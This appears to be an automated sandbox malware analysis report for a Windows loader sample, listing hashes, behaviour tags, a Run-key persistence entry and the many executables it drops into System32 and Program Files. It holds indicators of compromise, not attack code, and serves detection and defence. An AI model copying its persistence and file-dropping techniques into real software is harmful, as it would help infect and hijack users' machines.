Malware Analysis Report

2025-08-10 20:04

Sample ID 250704-pcafdsswbw
Target 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop
SHA256 0dacb1d51560612a2f24f0c64b40aabc49d9b9522a05a930df299b8f540af440
Tags
adware discovery persistence spyware stealer
score
7/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V16
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
7/10

SHA256

0dacb1d51560612a2f24f0c64b40aabc49d9b9522a05a930df299b8f540af440

Threat Level: Shows suspicious behavior

The file 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop was found to show suspicious behavior.

Malicious Activity Summary

adware discovery persistence spyware stealer

Reads user/profile data of web browsers

Adds Run key to start application

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Browser Information Discovery

System Location Discovery: System Language Discovery

Suspicious use of FindShellTrayWindow

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies registry class

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious use of SetWindowsHookEx

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-07-04 12:10

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-07-04 12:10

Reported

2025-07-04 12:13

Platform

win10v2004-20250619-en

Max time kernel

148s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ati display driver = "ÔN@" C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\ComputerDefaults.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\msra.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\RMActivate_ssp.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\ROUTE.EXE_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\SystemPropertiesPerformance.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\UserAccountControlSettings.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\at.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\dcomcnfg.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\regsvr32.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\verifiergui.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\EhStorAuthn.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\NetCfgNotifyObjectHost.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\userinit.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\logman.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\sdchange.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\wowreg32.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\fontdrvhost.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\hdwwiz.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\ktmutil.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\runas.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\dxdiag.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\hh.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\hh.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\SystemPropertiesDataExecutionPrevention.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\wiaacmgr.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\Fondue.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\IME\IMETC\IMTCPROP.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\Msdtc\Trace\msdtcvtr.bat- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\RMActivate_isv.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\SecEdit.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\SettingSyncHost.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\sfc.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\typeperf.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\cmdl32.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\wbem\WMIADAP.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\grpconv.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\sdbinst.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\chkdsk.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\dccw.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\fontdrvhost.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\ipconfig.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\LaunchTM.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\runonce.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\certutil.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\credwiz.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\diskperf.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\EaseOfAccessDialog.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\IME\IMETC\IMTCLNWZ.EXE- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\IME\SHARED\IMESEARCH.EXE_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\mmgaserver.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\newdev.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\cmd.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\print.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\bthudtask.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\LaunchWinApp.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\msfeedssync.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\openfiles.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\poqexec.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\SyncHost.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\tasklist.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\wlanext.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\wbem\WmiPrvSE.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Microsoft Office\root\Office16\msoia.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Google\Chrome\Application\chrome.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\rmic.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\jabswitch.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\PDFREFLOW.EXE- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection64.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\PilotshubApp.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\msoev.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\schemagen.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\MSOSREC.EXE- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.69\elevation_service.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedge_pwa_launcher.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\javaws.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\jps.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\rmiregistry.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\misc.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Microsoft.WebMediaExtensions.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.69\msedge.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\misc.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\Download\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\133.0.3065.69\MicrosoftEdge_X64_133.0.3065.69.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\javac.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\javah.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\java.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\pptico.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\GetHelp.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\Download\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\133.0.3065.69\MicrosoftEdge_X64_133.0.3065.69.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Windows Media Player\wmpnetwk.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\codecpacks.VP9.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\grv_icons.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\7-Zip\7zFM.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Windows Media Player\wmprph.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\Acrobat- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\pwahelper.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\dotnet\dotnet.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\ssvagent.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jre-1.8\bin\java-rmi.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Source Engine\OSE.EXE C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Windows Media Player\wmpshare.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.69\identity_helper.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\MicrosoftEdgeUpdateSetup.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\orbd.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaws.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\GRAPH.EXE- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\native2ascii.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
